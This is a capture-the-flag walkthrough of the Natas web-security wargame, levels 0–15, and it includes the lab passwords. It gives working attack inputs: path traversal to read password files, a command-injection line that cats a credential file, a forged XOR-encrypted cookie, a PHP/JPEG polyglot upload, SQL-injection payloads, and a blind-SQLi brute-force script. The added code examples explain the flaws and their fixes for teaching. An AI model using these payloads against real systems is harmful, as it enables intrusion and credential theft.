Wargame – Natas 0-15 Walkthrough

Level 0

URL:      http://natas0.natas.labs.overthewire.org

Username/password: natas0/natas0

View the HTML source; the password for the next level is in a comment.

Level 1

Level 2

Follow the path shown in the source to the files directory.

Open users.txt there.

Level 3

Even Google can't find it, which means the site has rules for crawlers: check robots.txt.

Browse to the disallowed path listed there; it contains a users.txt.

natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

Level 4

Set the Referer header to the URL the page says authorized users must come from.

Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

Level 5

Set the loggedin cookie to 1.

Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Level 6

The source includes secret.inc; request that file directly (following the include path) to read the secret.

Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

Level 7

Local file inclusion: the page parameter goes straight into include(), so it can pull in any file the web server can read.

http://natas7.natas.labs.overthewire.org/index.php?page=../../../../etc/natas_webpass/natas8
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

Level 8

Reverse the secret encoding. The source builds the encoded secret as bin2hex(strrev(base64_encode($secret))), so undo the three steps in reverse order:

hex2bin("3d3d516343746d4d6d6c315669563362") = "==QcCtmMml1ViV3b"

strrev("==QcCtmMml1ViV3b") = "b3ViV1lmMmtCcQ=="

base64_decode("b3ViV1lmMmtCcQ==") = "oubWYf2kBq"

Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
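As an added example (mine, not code from the page or from Natas), the same three steps as reusable encode and decode functions in Python, so the round trip can be checked: the encoder is natas8's bin2hex(strrev(base64_encode($secret))), and the decoder applies the inverse of each step in reverse order.

```python
import base64
import binascii

# Encoded secret from the natas8 source, as quoted above
ENCODED_SECRET = "3d3d516343746d4d6d6c315669563362"


def encode_secret(secret: str) -> str:
    """natas8's encodeSecret(): bin2hex(strrev(base64_encode($secret)))."""
    b64 = base64.b64encode(secret.encode()).decode()   # base64_encode
    reversed_b64 = b64[::-1]                            # strrev
    return binascii.hexlify(reversed_b64.encode()).decode()  # bin2hex


def decode_secret(encoded: str) -> str:
    """Undo each step in reverse order; all three are bijections, so nothing is lost."""
    reversed_b64 = binascii.unhexlify(encoded).decode()  # hex2bin
    b64 = reversed_b64[::-1]                              # strrev
    return base64.b64decode(b64).decode()                 # base64_decode


if __name__ == "__main__":
    print(decode_secret(ENCODED_SECRET))
```

The lesson is the one the level teaches: a chain of reversible transformations is encoding, not encryption, and anyone holding the output can recover the input without a key.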

Level 9

passthru() runs an external command with the user's input concatenated into it: command injection.

Read the natas10 password directly by terminating the grep command and appending your own: ; cat /etc/natas_webpass/natas10

nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

Level 10

Some characters (; | &) are now filtered, so a second command can't be chained on. The input still lands in grep's argument list, though, so search for .* /etc/natas_webpass/natas11 instead: .* matches every line and the extra word becomes a second file for grep to read, so it prints the password file.

U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
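An added example (mine, not the natas source) that rebuilds natas10's filter and grep call locally in Python, with a constructed dictionary and a fake password file, to show why blocking ; | & stops command chaining but not argument injection. The file names dictionary.txt and natas11_webpass and the password are constructed for the demo; the real target is /etc/natas_webpass/natas11.

```python
import os
import re
import subprocess
import tempfile

FAKE_PASSWORD = "FakeNatas11Password"  # constructed stand-in for the contents of /etc/natas_webpass/natas11


def build_fake_site(tmpdir: str) -> None:
    """Constructed test data: a tiny dictionary and a fake password file next to it."""
    with open(os.path.join(tmpdir, "dictionary.txt"), "w") as f:
        f.write("apple\nbanana\n")
    with open(os.path.join(tmpdir, "natas11_webpass"), "w") as f:
        f.write(FAKE_PASSWORD + "\n")


def natas10_search(key: str, cwd: str) -> str:
    """Reproduces natas10: reject ; | & and otherwise passthru("grep -i $key dictionary.txt")."""
    if re.search(r"[;|&]", key):
        return "Input contains an illegal character!"
    # passthru() hands the string to /bin/sh -c, which is what shell=True does here.
    # The shell splits the unquoted $key into words, so a space in the input turns
    # the rest of it into extra grep arguments, i.e. extra file names.
    result = subprocess.run("grep -i " + key + " dictionary.txt", shell=True, cwd=cwd,
                            capture_output=True, text=True)
    return result.stdout


def run_demo() -> dict:
    with tempfile.TemporaryDirectory() as tmpdir:
        build_fake_site(tmpdir)
        return {
            "normal": natas10_search("apple", tmpdir),
            # chaining is caught by the character filter
            "chained": natas10_search("; cat natas11_webpass", tmpdir),
            # argument injection: .* matches every line, the extra word is a second file.
            # (The shell also globs .* to . and .. in cwd, so grep actually sees the
            # pattern "." plus those directories; it complains about them on stderr and
            # still prints every line of the injected file.)
            "argument": natas10_search(".* natas11_webpass", tmpdir),
        }


if __name__ == "__main__":
    for name, output in run_demo().items():
        print(name, "->", output.strip())
```

A denylist of shell metacharacters never fixes this class of bug; the fix is to not build a shell command from user input at all (pass an argument vector, or escape with escapeshellarg() in PHP).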

Level 11

From the PHP and JS code of the page:

<?
$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {
    $key = '<censored>';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
    $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}

function loadData($def) {
    global $_COOKIE;
    $mydata = $def;
    if(array_key_exists("data", $_COOKIE)) {
    $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
    if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {
        if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
        $mydata['showpassword'] = $tempdata['showpassword'];
        $mydata['bgcolor'] = $tempdata['bgcolor'];
        }
    }
    }
    return $mydata;
}
function saveData($d) {
    setcookie("data", base64_encode(xor_encrypt(json_encode($d))));
}

$data = loadData($defaultdata);

if(array_key_exists("bgcolor",$_REQUEST)) {
    if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {
        $data['bgcolor'] = $_REQUEST['bgcolor'];
    }
}

saveData($data);
?>
<h1>natas11</h1>
<div id="content">
<body style="background: <?=$data['bgcolor']?>;">
Cookies are protected with XOR encryption<br/><br/>

<?
if($data["showpassword"] == "yes") {
    print "The password for natas12 is <censored><br>";
}
?>

We need to recover the key and then set showpassword=yes.

The default data is showpassword=no and bgcolor=#ffffff.

The data value is stored in the cookie; at this point the cookie is

ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw=

Reverse the algorithm to recover the key. XOR is its own inverse, so XORing the decoded cookie (ciphertext) with the plaintext we already know (the JSON of the default data) yields the key stream:

<?php
// Ciphertext: the cookie the server set, base64-decoded
$origData = base64_decode(
    "ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw=");
// Known plaintext: json_encode() of the default data
$known = '{"showpassword":"no","bgcolor":"#ffffff"}';
$outText = "";
// ciphertext XOR plaintext = key stream (the key, repeated)
for ($i = 0; $i < strlen($origData); $i++) {
    $outText .= $origData[$i] ^ $known[$i % strlen($known)];
}
echo $outText;
?>

Running it prints qw8J over and over (the key stream repeats with the key length), so key = qw8J.

Now compute the cookie for showpassword=yes with the same algorithm and the recovered key:

<?php
function xor_encrypt($in) {
    $key = 'qw8J';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
    $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}
echo base64_encode(xor_encrypt('{"showpassword":"yes","bgcolor":"#ffffff"}'));
?>

Running it gives

ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK

Set the data cookie to this value from the browser console (document.cookie) and reload; the page then prints the password:

EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3
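As an added example (mine, not code from the page or from Natas), the same known-plaintext key recovery and cookie forgery in Python, written generally: it finds the shortest repeating period of the key stream instead of eyeballing it, and forges a cookie for any data dict. The cookie value, default data and key are the ones above; the one assumption is that PHP's json_encode produced compact JSON without spaces, which the recovered key stream confirms.

```python
import base64
import json

# Values from the level: the cookie the server set and the default data it encodes
COOKIE_B64 = "ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw="
DEFAULT_DATA = {"showpassword": "no", "bgcolor": "#ffffff"}


def php_json(data: dict) -> bytes:
    # Assumption: PHP json_encode() output for this data is compact JSON with no spaces
    return json.dumps(data, separators=(",", ":")).encode()


def xor_with_key(data: bytes, key: bytes) -> bytes:
    # Same loop as xor_encrypt(): byte i is XORed with key[i % len(key)]
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(cookie_b64: str, known_plaintext: bytes) -> bytes:
    """Known-plaintext attack on repeating-key XOR: C XOR P = K repeated."""
    ciphertext = base64.b64decode(cookie_b64)
    if len(ciphertext) != len(known_plaintext):
        raise ValueError("cookie length does not match the guessed plaintext")
    # Plaintext is as long as the ciphertext, so this is a plain byte-wise XOR
    stream = xor_with_key(ciphertext, known_plaintext)
    # The stream repeats with the key length; return the shortest period that explains
    # all of it (a key with internal repetition, e.g. "abab", would be reported shorter)
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return stream[:period]
    return stream


def forge_cookie(key: bytes, data: dict) -> str:
    # Mirrors saveData(): base64_encode(xor_encrypt(json_encode($d)))
    return base64.b64encode(xor_with_key(php_json(data), key)).decode()


if __name__ == "__main__":
    key = recover_key(COOKIE_B64, php_json(DEFAULT_DATA))
    print("key:", key.decode())
    print("cookie:", forge_cookie(key, {"showpassword": "yes", "bgcolor": "#ffffff"}))
```

The design point is the one the level hides behind "protected with XOR encryption": a repeating-key XOR with a public, predictable plaintext leaks the key outright, and nothing authenticates the cookie, so the client can mint any value it likes.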

Level 12

Upload a PHP file, intercept the request, and change the jpg extension to php.

Open the resulting php link; the server executes the code and prints the password.

jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY

Level 13

Changing the extension alone no longer works; the server now checks that the uploaded content is an image.

Open the file in WinHex and make an image/PHP polyglot by writing the JPEG file header FF D8 FF E0 in front of the PHP code.

Intercept the request and change the extension to php; the upload succeeds and the php path can be visited.

Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1
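An added example (mine, not the natas code) that builds the same JPEG/PHP polyglot programmatically and reproduces natas13's two decisions: reject anything that does not start with a JPEG signature (what exif_imagetype() checks), but keep whatever extension the client supplied. The PHP payload and the file names are constructed for the demo; only the header bytes FF D8 FF E0 come from the walkthrough, and the stored name is simplified to "upload" plus the extension.

```python
import os

# The bytes the walkthrough writes with WinHex: JPEG SOI marker (FF D8) followed by the
# start of an APP0 marker (FF E0)
JPEG_HEADER = b"\xff\xd8\xff\xe0"

# Constructed payload for the demo; on the real level it would read the next password file
PHP_PAYLOAD = "<?php echo file_get_contents('/etc/natas_webpass/natas14'); ?>"


def make_jpeg_php_polyglot(php_source: str) -> bytes:
    # PHP copies bytes outside <?php ... ?> to the output untouched, so the header is
    # harmless to the interpreter, while the image check only ever looks at those bytes.
    return JPEG_HEADER + b"\n" + php_source.encode()


def looks_like_jpeg(data: bytes) -> bool:
    # Approximates exif_imagetype(): it recognises a JPEG by the leading FF D8 FF signature
    return data[:3] == b"\xff\xd8\xff"


def natas13_upload(client_filename: str, data: bytes) -> str:
    """Simplified natas13: signature check on content, extension taken from the client."""
    if not looks_like_jpeg(data):
        return "File is not an image"
    ext = os.path.splitext(client_filename)[1]  # trusting the client's extension is the bug
    return "upload" + ext


if __name__ == "__main__":
    print(natas13_upload("shell.php", PHP_PAYLOAD.encode()))
    print(natas13_upload("shell.php", make_jpeg_php_polyglot(PHP_PAYLOAD)))
```

A signature check answers "does this start like an image?", not "is this only an image?"; the upload handler has to fix the extension server-side (or store uploads where PHP is never executed) for the check to mean anything.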

Level 14

$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";

The classic always-true injection works: put " or "1"="1 in the password field. (AND binds tighter than OR, so the same payload in the username field alone would still be ANDed with the password check and fail.)

AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J
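An added example (not from the page) that reproduces the natas14 login query against an in-memory SQLite table to show exactly where the payload has to go. SQLite delimits strings with single quotes, so the payload is written ' or '1'='1 here; natas14's MySQL query uses double quotes, but the structure is identical. The table and password are constructed for the demo, and the parameterized version is added as the fix.

```python
import sqlite3

# The walkthrough's payload, with ' instead of " because SQLite string literals use '
PAYLOAD = "' or '1'='1"


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for natas14's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('natas15', 'not-the-real-password')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Same construction as natas14: user input concatenated straight into the query text
    query = ("SELECT * FROM users WHERE username='" + username +
             "' AND password='" + password + "'")
    return len(conn.execute(query).fetchall()) > 0


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # The fix: placeholders keep the input as data, so quotes cannot change the query's shape
    query = "SELECT * FROM users WHERE username=? AND password=?"
    return len(conn.execute(query, (username, password)).fetchall()) > 0


if __name__ == "__main__":
    conn = make_db()
    # username='' or '1'='1' AND password='wrong' parses as '' OR ('1'='1' AND ...): still false
    print("payload in username:", login_vulnerable(conn, PAYLOAD, "wrong"))
    # username='nobody' AND password='' or '1'='1' parses as (... AND ...) OR true: bypass
    print("payload in password:", login_vulnerable(conn, "nobody", PAYLOAD))
    print("parameterized:      ", login_parameterized(conn, "nobody", PAYLOAD))
```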

Level 15

This level is a boolean-based blind SQL injection: the page only reports whether a user exists, so a search-style injection with LIKE BINARY is used to brute-force the password one character at a time (BINARY makes the LIKE comparison case-sensitive).

import requests
import string

url = "http://natas15.natas.labs.overthewire.org/"
auth = ("natas15", "AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J")  # HTTP basic auth instead of user:pass@ in the URL
characters = string.ascii_letters + string.digits
exists_str = "This user exists."


def user_exists(payload):
    # The level's query supplies the closing quote, so the SQL becomes:
    #   SELECT * from users where username="natas16" AND password LIKE BINARY "...%"
    r = requests.get(url, params={"username": payload}, auth=auth)
    return exists_str in r.text


# Step 1: find which characters occur in the password at all
strs = ""
for c in characters:
    if user_exists('natas16" AND password LIKE BINARY "%' + c + '%'):
        strs += c
        print(strs)

# strs = 'acehijmnpqtwBEHINORW03569'
# Step 2: extend the known prefix one character at a time (passwords are 32 characters)
password = ""
for i in range(32):
    for c in strs:
        if user_exists('natas16" AND password LIKE BINARY "' + password + c + '%'):
            password += c
            print("Password:", password)
            break

Running sqlmap with boolean-based blind injection also recovers the natas16 password.
